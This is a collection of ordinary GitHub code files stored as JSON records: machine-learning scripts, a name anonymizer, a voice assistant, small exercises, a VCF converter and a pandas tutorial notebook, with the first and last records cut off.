satır =1 ise ödül 1\n toplam = toplam + odul\n\n print(toplam)\n\nplt.hist(secilenler)\nplt.show()\n\n\n\n\n# print(veriler)","repo_name":"ahmeterenozkaya/PythonMachineLearning","sub_path":"UpperConfidenceBound/randomselection.py","file_name":"randomselection.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17939238049","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 25 08:58:52 2023\n\nProgram that takes a plain text file and filters out names, replacing them\nwith \n\n@author: matthew\n\"\"\"\n\nimport sys\nimport string\n\npunctuation = list(string.punctuation)\n\n# %% Open the file\ntry:\n with open(sys.argv[1]) as f:\n name_list = [line.rstrip().title() for line in f.readlines()]\n with open(sys.argv[2]) as f:\n contents_list = f.readlines()\nexcept (FileNotFoundError, IndexError) as e:\n if isinstance(e, FileNotFoundError):\n print(\"File not found, double check the name and try again.\")\n elif isinstance(e, IndexError):\n print(\"Please include a file name.\")\n sys.exit()\n\n# %% Compare each word to the name list and change to if matched.\n\nanonymized_list = []\n\nfor line in contents_list:\n new_line = []\n for word in line.split(\" \"):\n word_stripped = word.strip()\n if (len(word_stripped) > 1 and word_stripped[-1] in punctuation):\n word_trimmed = word_stripped[:-1]\n if word_trimmed in name_list:\n new_line.append(f\"{word_stripped[-1]}\")\n else:\n new_line.append(word)\n elif word_stripped in name_list:\n new_line.append(\"\")\n elif (len(word_stripped) > 2 and word_stripped[-2] == \"'\"):\n if word_stripped[:-2] in name_list:\n new_line.append(\"'s\")\n else:\n new_line.append(word)\n anonymized_list.append(\" \".join(new_line))\n\n\n# %% Write the output file\n\nwith open(\"anonymized.txt\", \"w\") as f:\n f.write(''.join(anonymized_list))\n","repo_name":"marnoldris/python","sub_path":"name_filter.py","file_name":"name_filter.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4878206743","text":"import torch\nfrom torch import Tensor, nn\nfrom torch.nn import functional as F\n\n\ndef conv_block(in_channels, out_channels):\n \"\"\"\n returns a block conv-bn-relu-pool\n \"\"\"\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n\n\nclass ProtoNet(nn.Module):\n \"\"\"\n Consists of 4 conv blocks and 1 fully connected layer\n \"\"\"\n\n def __init__(\n self,\n # img_size: tuple = (96, 96),\n input_chan: int = 3,\n hidden_chan: int = 64,\n conv_output_chan: int = 64,\n # output_dim: int = 576,\n ):\n super(ProtoNet, self).__init__()\n self.encoder = nn.Sequential(\n conv_block(input_chan, hidden_chan), # -> (B, 64, H/2, W/2)\n conv_block(hidden_chan, hidden_chan), # -> (B, 64, H/4, W/4)\n conv_block(hidden_chan, hidden_chan), # -> (B, 64, H/8, W/8)\n conv_block(\n hidden_chan, conv_output_chan\n ), # -> (B, 32, H/16, W/16)\n )\n # h = img_size[0]\n # w = img_size[1]\n # flat_dim = z_dim * h // 16 * w // 16\n # self.fc = nn.Linear(flat_dim, output_dim)\n\n def forward(self, x):\n # print(x.size()) # x: (B, 3, H, W)\n x = self.encoder(x) # -> (B, 64, H/16, W/16)\n x = x.view(x.size(0), -1) # -> (B, z_dim * H/16 * W/16)\n # x = self.fc(x) # -> (B, output_dim)\n return x\n\n\nclass PrototypicalLoss(nn.Module):\n \"\"\"\n Loss 
class deriving from Module for the prototypical loss function defined\n below\n \"\"\"\n\n def __init__(self, n_support):\n super(PrototypicalLoss, self).__init__()\n self.n_support = n_support\n\n def forward(self, input, target):\n return prototypical_loss(input, target, self.n_support)\n\n\ndef euclidean_dist(x: Tensor, y: Tensor) -> Tensor:\n \"\"\"\n Compute euclidean distance between two tensors\n\n Params:\n - x: Tensor of shape (n, d), n is the number of samples, d is the feature.\n - y: Tensor of shape (c, d), representation vectors of prototypes.\n \"\"\"\n n = x.size(0) # 300\n c = y.size(0) # 60\n d = x.size(1) # 576\n assert d == y.size(1)\n\n x = x.unsqueeze(1).expand(n, c, d)\n y = y.unsqueeze(0).expand(n, c, d)\n return torch.pow(x - y, 2).sum(2)\n\n\ndef prototypical_loss(hidden: Tensor, labels: Tensor, num_support: int):\n \"\"\"\n Inspired by https://github.com/jakesnell/prototypical-networks/blob/master/protonets/models/few_shot.py\n\n Compute the barycentres by averaging the features of n_support\n samples for each class in target, computes then the distances from each\n samples' features to each one of the barycentres, computes the\n log_probability for each n_query samples for each one of the current\n classes, of appartaining to a class c, loss and accuracy are then computed\n and returned\n\n Params:\n - hidden: the model output for a batch of samples\n - labels: ground truth for the above batch of samples\n - n_support: number of samples to keep in account when computing\n barycentres, for each one of the current classes\n \"\"\" # noqa\n labels = labels.to(\"cpu\") # (B)\n hidden = hidden.to(\"cpu\") # (B, C)\n\n # FIXME when torch.unique will be available on cuda too\n # 返回有哪些 class(returns the unique elements of the input tensor)\n classes = torch.unique(labels)\n n_classes = len(classes)\n\n # FIXME when torch will support where as np\n # assuming n_query, n_target constants\n\n # Occurrence of class[0] in labels - n_support\n n_query = labels.eq(classes[0].item()).sum().item() - num_support\n\n # 每一个 class 的 n_query + n_support 数目都是一样的,\n # 所以取第一个 class 来算就行了,\n # 在这个 episode 里面取到的总样本数减去 n_support 就是 n_query\n support_idxs = [\n labels.eq(c).nonzero()[:num_support].squeeze(1) for c in classes\n ]\n # 对于每一个 class(label),\n # .eq 判断 target 的每一位是否是这个 label,\n # .nonzero: return indices of all nonzero elements\n # [:n_support] 从里面取出 n_support 作为支撑集,\n # squeeze 将其从 (n_support, 1) 压缩为 n_support 的 tensor\n\n prototypes = torch.stack(\n [hidden[idx_list].mean(0) for idx_list in support_idxs]\n ) # 计算每一个label的c_k(representation)\n\n # FIXME when torch will support where as np\n # query_idxs = torch.stack(\n # list(map(lambda c: target_cpu.eq(c).nonzero()[n_support:], classes))\n # )\n query_idxs = torch.stack(\n [labels.eq(c).nonzero()[num_support:] for c in classes]\n )\n\n query_idxs = query_idxs.view(-1)\n\n # 获取查询集的对应编号,但是最后那个view(-1)啥意思啊\n\n query_samples = hidden.to(\"cpu\")[query_idxs]\n # 是按class的顺序排的\n\n # (n_query*n_classes)*n_classes\n dists = euclidean_dist(query_samples, prototypes)\n\n # n_classes*n_query*n_classes\n log_p_y = F.log_softmax(-dists, dim=1).view(n_classes, n_query, -1)\n\n target_inds = torch.arange(0, n_classes) # 从0~n_classes-1的tensor\n # n_classes*1*1,内容从0~n_classes-1\n target_inds = target_inds.view(n_classes, 1, 1)\n # n_claasses*n_query*1,从0~n_classes-1每个都有n_query个\n target_inds = target_inds.expand(n_classes, n_query, 1).long()\n\n loss_val = -log_p_y.gather(2, target_inds).squeeze().view(-1).mean()\n # 
torch.max(Tensor,dim)返回两个值,第一个为储存着最大值的Tensor,第二维为储存着最大值对应的index的Tensor\n _, y_hat = log_p_y.max(2)\n # y_hat:n_classes*n_query\n # target_inds:n_classes*n_query*1\n acc_val = y_hat.eq(target_inds.squeeze()).float().mean()\n\n return loss_val, acc_val\n","repo_name":"donny-chan/chujian-classifier","sub_path":"modeling/protonet.py","file_name":"protonet.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"174147183","text":"def DiseaseModel_Evaluation(scriptInputs):\r\n '''\r\n DiseaseModel_Evaluation performs model inference and figure generation for disease classification\r\n Parameters and relevant files are provided in the accompanying yaml file (disease_info.yml)\r\n \r\n Copyright (C) 2021, Rajaram Lab - UTSouthwestern \r\n \r\n This file is part of anc-2021-dl-wm-tauopathy.\r\n \r\n anc-2021-dl-wm-tauopathy is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n anc-2021-dl-wm-tauopathy is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with anc-2021-dl-wm-tauopathy. If not, see .\r\n \r\n Anthony Vega, 2021\r\n '''\r\n import os as os\r\n os.environ['CUDA_VISIBLE_DEVICES']='0'\r\n import MILCore as mil\r\n import PatchGen as pg\r\n import numpy as np\r\n import pickle\r\n import matplotlib.pyplot as plt\r\n from sklearn.metrics import confusion_matrix\r\n from tensorflow.keras.models import load_model\r\n import itertools\r\n import seaborn as sns\r\n\r\n def plot_confusion_matrix(cm, classes,\r\n normalize=False,\r\n title='Confusion matrix',\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n\r\n \r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title,fontsize=32)\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45,fontsize=32)\r\n plt.yticks(tick_marks, classes,fontsize=32)\r\n plt.ylim((-0.5,len(classes)-0.5))\r\n \r\n fmt = '.2f' if normalize else '0.2f'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\",fontsize=32)\r\n \r\n plt.tight_layout()\r\n plt.ylabel('True label',fontsize=32)\r\n plt.xlabel('Predicted label',fontsize=32)\r\n \r\n def plot_avg_confusion_matrix(cm_raw, classes,\r\n normalize=False,\r\n title='Confusion matrix',\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the average confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n cm = np.mean(cm_raw,axis=2)\r\n cm_s = np.std(cm_raw,axis=2)\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n cm_s = cm_s.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n\r\n \r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n 
plt.title(title,fontsize=32)\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45,fontsize=32)\r\n plt.yticks(tick_marks, classes,fontsize=32)\r\n plt.ylim((-0.5,len(classes)-0.5))\r\n \r\n fmt = '.2f' if normalize else '0.2f'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\",fontsize=32)\r\n plt.text(j, i-0.2, '+/- ' +format(cm_s[i, j], fmt),\r\n horizontalalignment=\"center\",verticalalignment=\"baseline\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\",fontsize=32)\r\n \r\n plt.tight_layout()\r\n plt.ylabel('True label',fontsize=32)\r\n plt.xlabel('Predicted label',fontsize=32)\r\n \r\n def save_dict(new_dict,name,pFolder):\r\n #First check that secondary_dict is in fact and dictionary\r\n if type(new_dict) is dict:\r\n print('Dictionary found')\r\n with open(pFolder+ name + '.pkl', 'wb') as f:\r\n pickle.dump(new_dict, f, pickle.HIGHEST_PROTOCOL)\r\n \r\n else:\r\n print('No dictionary found! Saving Failed')\r\n \r\n \r\n \r\n def load_dict(name ,pFolder):\r\n with open(pFolder + name + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n # %% Section to read yaml info\r\n #Relevant directories\r\n patchDir = scriptInputs['patchDir']\r\n modelDir= scriptInputs['modelDir']\r\n resultsDir= scriptInputs['resultsDir']\r\n regenerateData = scriptInputs['regenerateData']\r\n figureDir = scriptInputs['figureDir']\r\n \r\n \r\n # %% Run analysis to apply both CTX and WM disease classifiers on all test folds (Fig 5b)\r\n if regenerateData == True:\r\n regionTypes=['CTX','WM']\r\n results={}\r\n for region in regionTypes:\r\n # Create variables\r\n results[region]={}\r\n #What fraction of patches were correctly classified?\r\n results[region]['slideAcc'] = np.zeros([49,2])\r\n # What is the class composition of each slide\r\n results[region]['slideComp'] = np.zeros([49,3])\r\n # Confusion matrix\r\n results[region]['confMatTotal'] = np.zeros([3,3,3])\r\n #Counter to keep track\r\n compCount=0 \r\n #milSlideIdx\r\n results[region]['milSlideList'] = []\r\n \r\n \r\n for foldNumber in range(1,4):\r\n # foldNumber=1\r\n print(foldNumber)\r\n foldsDir=os.path.join(patchDir,region,'Folds')\r\n \r\n testHdf5File=os.path.join(foldsDir,'Testing'+str(foldNumber)+'.txt')\r\n \r\n testHdf5List=[line.rstrip('\\n') for line in open(testHdf5File)]\r\n testSlideDiseaseList=[os.path.split(h)[-1].split('_')[0] for h in testHdf5List]\r\n \r\n milSlideName = [x.split('/',)[-1] for x in testHdf5List]\r\n results[region]['milSlideList'] =results[region]['milSlideList']+milSlideName\r\n classDict={'AD':0,'CBD':1,'PSP':2}\r\n \r\n testPatches,testAnnoLabels,temp,testSlideNumbers,testPatchPos=\\\r\n pg.LoadPatchData(testHdf5List,returnSampleNumbers=True,returnPatchCenters=True)\r\n testPatches=testPatches[0]\r\n testDiseaseNames,testDiseaseNumbers=np.unique(testSlideDiseaseList,return_inverse=True)\r\n testClasses=testDiseaseNumbers[np.uint8(testSlideNumbers)]\r\n \r\n # % Load Model ---------------------------------\r\n milModelFile = os.path.join(modelDir,'mil_DiseaseClassifier_'+region+'_E3_Fold' \r\n + str(foldNumber)+ '.h5') \r\n model=load_model(milModelFile,compile=False,custom_objects=\\\r\n {'Normalize_Layer':mil.Normalize_Layer,\r\n 'Last_Sigmoid':mil.Last_Sigmoid,\r\n 'Last_Softmax':mil.Last_Softmax})\r\n \r\n # % Apply model to testing data------------------------------\r\n 
numberOfClasses=len(classDict)#train\r\n \r\n nPatchesPerSlide=1000\r\n numberOfTestSlides=len(np.unique(testSlideNumbers))\r\n testIdxToProfile=[]\r\n for slideNumber in range(numberOfTestSlides):\r\n testSlideIdx = np.random.choice(np.where(testSlideNumbers==slideNumber)[0],nPatchesPerSlide)#N\r\n testIdxToProfile.append(testSlideIdx)#N\r\n\r\n testIdxToProfile=np.array(testIdxToProfile).flatten()\r\n \r\n classResponses=model.predict(testPatches[testIdxToProfile]/255,verbose=1)\r\n predClasses=np.argmax(classResponses,axis=-1)\r\n \r\n confMat=confusion_matrix(testClasses[testIdxToProfile], predClasses)\r\n results[region]['confMatTotal'][:,:,foldNumber-1] = confMat.astype('float') / confMat.sum(axis=1)[:, np.newaxis] \r\n gtClass = testClasses[testIdxToProfile]\r\n \r\n for slideNumber in range(numberOfTestSlides):\r\n isInSlide=testSlideNumbers[testIdxToProfile]==slideNumber\r\n slideCompFull = np.argmax(classResponses[isInSlide,:],axis=-1)\r\n gtComp = gtClass[isInSlide]\r\n correctComp = np.uint((gtComp-slideCompFull)==0)\r\n results[region]['slideAcc'][compCount,0] = np.sum(correctComp)/nPatchesPerSlide\r\n results[region]['slideAcc'][compCount,1] = gtComp[0]\r\n n = plt.hist(slideCompFull,[0,1,2,3])\r\n results[region]['slideComp'][compCount] = n[0]/1000\r\n compCount = compCount+1\r\n \r\n \r\n # %Save Results here\r\n resultsSaveFile = 'milResults'\r\n save_dict(results,resultsSaveFile,resultsDir)\r\n else:\r\n \r\n # % Or load previous results\r\n resultsLoadFile = 'milResults'\r\n results = load_dict(resultsLoadFile,resultsDir)\r\n \r\n \r\n # % Plot all confusion matrices (Fig 5b)---------------------------------------\r\n print('Generating disease classification accuracy (Fig 5b, S8)') \r\n labels = ['AD', 'CBD','PSP']\r\n fig= plt.figure(figsize=(20,10))\r\n for regionCounter,region in enumerate(results):\r\n plt.subplot(1,2,regionCounter+1)\r\n plot_avg_confusion_matrix(results[region]['confMatTotal'],\r\n labels,normalize=True,\r\n title = region) \r\n fig.savefig(figureDir+'Figure5B.png')\r\n \r\n \r\n # % Compare CTX and WM accuracy (Fig S8a)-------------------------------------\r\n nBins=4\r\n hist2d,xBins,yBins=np.histogram2d(results['CTX']['slideAcc'][:,0],\r\n results['WM']['slideAcc'][:,0],\r\n bins=nBins,\r\n range=[[0,1],[0,1]])\r\n fig= plt.figure(figsize=(7,7))\r\n sns.heatmap(hist2d,annot=True,cmap='Wistia')\r\n plt.ylim(0,nBins+0.5) \r\n \r\n plt.plot([nBins/2,nBins/2],[0,nBins],'--k')\r\n plt.plot([0,nBins],[nBins/2,nBins/2],'--k')\r\n makePct = lambda pctList: [str(int(p))+'%' for p in pctList]\r\n plt.xticks(xBins*nBins,makePct(100*xBins))\r\n plt.yticks(yBins*nBins,makePct(100*yBins),rotation=0)\r\n plt.xlabel('WM Accuracy')\r\n plt.ylabel('CTX Accuracy')\r\n plt.axis('square')\r\n fig.savefig(figureDir+'FigureS8A.png')\r\n \r\n \r\n # %Compare accuracy with consensus(Fig S8b)------------------------------------\r\n \r\n \r\n isHitCtx=np.argmax(results['CTX']['slideComp'],axis=1)!=results['CTX']['slideAcc'][:,1]\r\n isHitWm=np.argmax(results['WM']['slideComp'],axis=1)!=results['WM']['slideAcc'][:,1]\r\n isHitCons=np.argmax(results['CTX']['slideComp']+results['WM']['slideComp'],\r\n axis=1)!=results['WM']['slideAcc'][:,1]\r\n \r\n \r\n isHit=np.hstack([isHitWm,isHitCtx,isHitCons])\r\n disease=np.hstack([results['CTX']['slideAcc'][:,1],results['CTX']['slideAcc'][:,1],results['CTX']['slideAcc'][:,1]])\r\n modelType=np.hstack([0*np.ones(isHitWm.shape),1*np.ones(isHitWm.shape),2*np.ones(isHitWm.shape)])\r\n \r\n adCounts= 
np.array([np.sum(np.logical_and(disease[isHit]==0,modelType[isHit]==m)) for m in range(3)])\r\n pspCounts= np.array([np.sum(np.logical_and(disease[isHit]==2,modelType[isHit]==m)) for m in range(3)])\r\n cbdCounts= np.array([np.sum(np.logical_and(disease[isHit]==1,modelType[isHit]==m)) for m in range(3)])\r\n \r\n fig= plt.figure(figsize=(7,7))\r\n plt.bar(np.arange(3),adCounts,color='R')\r\n plt.bar(np.arange(3),pspCounts,bottom=adCounts,color='b')\r\n plt.bar(np.arange(3),cbdCounts,bottom=adCounts+pspCounts,color='g')\r\n plt.xticks(np.arange(3),['WM','CTX','Consensus'],rotation=0)\r\n plt.yticks(np.arange(5))\r\n plt.ylabel('Misclassified Samples')\r\n fig.savefig(figureDir+'FigureS8B.png')\r\n print('Disease classification figures finished!')\r\n","repo_name":"Rajaram-Lab/anc-2021-dl-wm-tauopathy","sub_path":"Disease_Classification/DiseaseModel_Evaluation.py","file_name":"DiseaseModel_Evaluation.py","file_ext":"py","file_size_in_byte":12746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37352806648","text":"import pyttsx3 #pip install pyttsx3\nimport speech_recognition as sr # pip install speechRegonition\nimport datetime\nimport wikipedia # pip install wikipedia\nimport webbrowser\nimport os\nimport smtplib\nfrom time import sleep\n\nengine = pyttsx3.init(\"sapi5\")\nvoices = engine.getProperty(\"voices\")\nvolume = engine.getProperty(\"volume\")\nspeak_velocity = engine.getProperty(\"rate\")\nassistant_name = \"Yummi\"\nuser_path_name = \"Nilcy Marinho\"\n\nengine.setProperty(\"voice\", voices[1].id)\nengine.setProperty(\"rate\", 170)\n\ndef speak(text=\"there is nothing to say\"):\n \"\"\"\n Write anything that you want your assistant to say.\n\n :param text: The text you want to pass to your assistant\n \"\"\"\n engine.say(text)\n engine.runAndWait()\n\n\ndef wish_me():\n \"\"\"\n This function control the way your assistant will wish you\n \"\"\"\n hour = int(datetime.datetime.now().hour)\n\n if hour > 6 and hour < 12:\n speak(\"Good Morning Master\")\n elif hour >= 12 and hour < 18:\n speak(\"Good Afternoon Master\")\n elif hour >= 18 and hour <= 23:\n speak(\"Good Evening Master\")\n else:\n speak(\"It's midnight, nice to see you master\")\n\n\ndef take_command():\n command = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n command.adjust_for_ambient_noise(source)\n audio = command.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = command.recognize_google(audio, language=\"en-us\")\n print(f\"User said: {query}\\n\")\n except Exception as error:\n speak(\"Sorry, I didn't understand\")\n query = \"\"\n finally:\n return query\n\n \nprint(f\"Initializing {assistant_name}...\")\nsleep(0.5)\nwish_me()\nquery = take_command()\n\nif \"wikipedia\" in query.lower():\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=2)\n print(results)\n speak(results)\nelif \"open code\" in query.lower():\n speak(\"opening code\")\n code_path=f\"C:\\\\Users\\\\{user_path_name}\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\n\nelif \"open youtube\" in query.lower():\n speak(\"opening youtube\")\n webbrowser.open(\"https:/youtube.com\", new=2)\nelif \"open google\" in query.lower():\n speak(\"opening google\")\n webbrowser.open(\"https:/google.com\", new=2)\nelif \"open github\" in query.lower():\n speak(\"opening github\")\n webbrowser.open(\"https:/github.com\", new=2)\n\nelif \"chill your mind\" in 
query.lower():\n speak(\"opening chill your mind radio\")\n webbrowser.open(\"https://www.youtube.com/watch?v=eQdA8dvsgQs\", new=2)\nelif \"play lo-fi\" in query.lower():\n speak(\"opening lo-fi radio\")\n webbrowser.open(\"https://www.youtube.com/watch?v=5qap5aO4i9A\", new=2)\n\nelif \"time now\" in query.lower():\n hour = datetime.datetime.now().hour\n minute = datetime.datetime.now().minute\n print(f\"It is {hour} hours and {minute} minutes\")\n speak(f\"It is {hour} hours and {minute} minutes\")\n \n\nsleep(2)\nos.system(\"cls\")\n","repo_name":"Thiagomrfs/Yummi-Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"34460975949","text":"def check(bus, n):\n\tfor b in bus:\n\t\t#print('\\t' + str((t+b[1]) % b[0]))\n\t\tif not (t + b[1]) % b[0] == 0:\n\t\t\treturn False\n\treturn True\n\n\nwith open('input.txt') as file:\n\tfile.readline()\n\tdata = []\n\tfor b in file.readline().strip('\\n').split(','):\n\t\tif b == 'x':\n\t\t\tdata.append(1)\n\t\telse:\n\t\t\tdata.append(int(b))\n\ndata = [[b, data.index(b)] for b in data if not b == 1]\n\n\nstep = 1\nt = 0\ntodo = data\nstop = False\n\nwhile todo:\n\tprint(t)\n\tt += step\n\tif check([todo[0]], t):\n\t\tstep *= todo[0][0]\n\t\tdel todo[0]\n\nprint(t)\n","repo_name":"Marval13/aoc","sub_path":"2020/13/13b.py","file_name":"13b.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31729057685","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nclass Stack:\n def __init__(self, value):\n node = Node(value)\n self.top = node\n self.height = 1\n\n def all(self):\n temp = self.top\n while temp is not None:\n print(temp.value)\n temp = temp.next\n\n def push(self, value):\n node = Node(value)\n if self.top is None:\n self.top = node\n self.height+=1\n\n node.next = self.top\n self.top = node\n self.height+=1\n \n def pop(self):\n if self.top is None:\n return None\n temp = self.top\n self.top = temp.next\n temp.next = None\n temp = None\n self.height-=1\n\nstack = Stack(2)\nstack.push(4)\nstack.pop()\nstack.all()","repo_name":"anice1/Data-Structures","sub_path":"Stacks.py","file_name":"Stacks.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9108788501","text":"import string\nimport argparse\n\ndef main():\n\n\tparser = argparse.ArgumentParser('\\n\\nQuesto tool converte solo REF e ALT nel vcf in UPPERCASE per il vcf di BCFTOOLS\\n')\n\tparser.add_argument('-I','--input',help=\"Input file in formato .vcf\")\n\t#parser.add_argument('-O','--outfile',help=\"File di output in vcf format\")\n\n\tglobal opts\n\topts = parser.parse_args()\n\n\twith open(opts.input) as vcf:\n\n\t\tfor line in vcf:\n\n\t\t\tif line.startswith('#'):\n\n\t\t\t\tout.write(line)\n\n\t\t\telse:\n\n\t\t\t\tline = line.rstrip()\n\t\t\t\tline = line.split('\\t')\n\t\t\t\tline[3]=line[3].upper()\n\t\t\t\tline[4]=line[4].upper()\n\n\t\t\t\tout.write('\\t'.join(line) + 
'\\n')\n\t\t\t\t\n\n\tout.close()\n\nmain()","repo_name":"urtism/CMG","sub_path":"SCRIPT_CMG/SCRIPT_PYTHON/FILE_MANIPULATION/Convert-Ref-Alt-To-UPPER.py","file_name":"Convert-Ref-Alt-To-UPPER.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"33971005900","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 8 14:28:43 2022\r\n\r\n@author: kimyelim\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.special as sci\r\nxmin=0\r\nresolution=100\r\nx=np.linspace(xmin,resolution)\r\nprint(x)\r\nC=1-sci.erf(x/(4*10000000*0.000001)**0.5)\r\nC2=1-sci.erf(x/(4*10000000*0.0001)**0.5)\r\nC3=1-sci.erf(x/(4*10000000*0.01)**0.5)\r\nC4=1-sci.erf(x/(4*10000000*10)**0.5)\r\nprint(C)\r\nfig=plt.figure(dpi=1000)\r\ncm=1/2.54\r\nfig,ax=plt.subplots(figsize=(19*cm,15*cm))\r\nax.plot(x,C)\r\nax.plot(x,C2)\r\nax.plot(x,C3)\r\nax.plot(x,C4)\r\nfontname={'fontname':'Times New Roman'}\r\nplt.xlabel(\"x\",fontsize=15,**fontname)\r\nplt.ylabel(\"C\",fontsize=15,**fontname)\r\nplt.xticks(np.arange(min(x),max(x),100),fontsize=10,**fontname)\r\nplt.xlim([0,100])\r\nplt.yticks(np.arange(0,1,0.1),fontsize=10,**fontname)\r\nplt.ylim([-0.6,1.1])\r\nplt.legend([r'$C(t=0.000001)=1-erf(x/\\sqrt{(4Dt)})$',r'$C2(t=0.0001)=1-erf(x/\\sqrt{(4Dt)})$',r'$C3(t=0.01)=1-erf(x/\\sqrt{(4Dt)})$',r'$C4(t=10)=1-erf(x/\\sqrt{(4Dt)})$'],loc='lower right')\r\nplt.title(\"density\",fontsize=20,**fontname)\r\nfig.savefig('plot_density.png',format='png',bbox_inches='tight',dpi=1000)","repo_name":"kimyelim00/test_1","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32483876990","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:percent,md\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.3.0\n# kernelspec:\n# display_name: modern-pandas\n# language: python\n# name: modern-pandas\n# ---\n\n# %% [markdown] Collapsed=\"false\"\n# # 1. Modern Pandas\n\n# %% [markdown] Collapsed=\"false\"\n# ## Get data\n\n# %% [markdown] Collapsed=\"false\"\n# Just downloading data here. 
Feel free to ignore 😅.\n\n# %% Collapsed=\"false\"\nimport os\nimport zipfile\n\nimport requests\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# %% Collapsed=\"false\"\nheaders = {\n \"Referer\": \"https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236&DB_Short_Name=On-Time\",\n \"Origin\": \"https://www.transtats.bts.gov\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n}\n\nparams = (\n (\"Table_ID\", \"236\"),\n (\"Has_Group\", \"3\"),\n (\"Is_Zipped\", \"0\"),\n)\n\nwith open(\"modern-1-url.txt\", encoding=\"utf-8\") as f:\n data = f.read().strip()\n\nos.makedirs(\"data\", exist_ok=True)\ndest = \"data/flights.csv.zip\"\n\nif not os.path.exists(dest):\n r = requests.post(\n \"https://www.transtats.bts.gov/DownLoad_Table.asp\",\n headers=headers,\n params=params,\n data=data,\n stream=True,\n )\n\n with open(\"data/flights.csv.zip\", \"wb\") as f:\n for chunk in r.iter_content(chunk_size=102400):\n if chunk:\n f.write(chunk)\n\n# %% Collapsed=\"false\"\nzf = zipfile.ZipFile(\"data/flights.csv.zip\")\nfp = zf.extract(zf.filelist[0].filename, path=\"data/\")\ndf = pd.read_csv(fp, parse_dates=[\"FL_DATE\"]).rename(columns=str.lower)\n\ndf.info()\n\n# %% [markdown] Collapsed=\"false\"\n# ## Index\n\n# %% [markdown] Collapsed=\"false\"\n# Two methods to get rows:\n#\n# 1. Use `.loc` for label-based indexing\n# 2. Use `.iloc` for positional indexing\n\n# %% Collapsed=\"false\"\nfirst = df.groupby(\"unique_carrier\").first()\n\n# %% Collapsed=\"false\"\nfirst.loc[[\"AA\", \"AS\", \"DL\"], [\"fl_date\", \"tail_num\"]]\n\n# %% Collapsed=\"false\"\nfirst.iloc[[0, 1, 3], [0, 1]]\n\n# %% [markdown] Collapsed=\"false\"\n# ## SettingWithCopy\n\n# %% [markdown] Collapsed=\"false\"\n# Do not let the ends of two square brackets touch `][`. This does _not_ result in an an assignment to column `\"b\"`:\n#\n# ```python\n# # This is bad, do not do\n# 